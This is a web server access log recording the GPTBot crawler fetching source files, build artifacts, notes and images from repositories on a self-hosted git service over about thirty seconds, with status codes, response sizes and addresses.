"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13652] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10193] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13701] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10925] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13180] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt?display=source" [Client 74.7.227.38] [Length 11369] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" +[17/Feb/2026:15:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/branch/main" [Client 74.7.227.38] [Length 7477] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" +[17/Feb/2026:15:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs?display=source" [Client 74.7.227.38] [Length 11933] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:15:54:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:15:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:15:54:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" +[17/Feb/2026:15:54:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12894] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" +[17/Feb/2026:15:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12896] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" +[17/Feb/2026:15:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11324] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" +[17/Feb/2026:15:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10939] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:15:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10939] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:15:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13701] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10194] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 14189] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" +[17/Feb/2026:15:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" +[17/Feb/2026:15:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11911] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" +[17/Feb/2026:15:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 12553] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" +[17/Feb/2026:15:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15797] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" +[17/Feb/2026:15:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 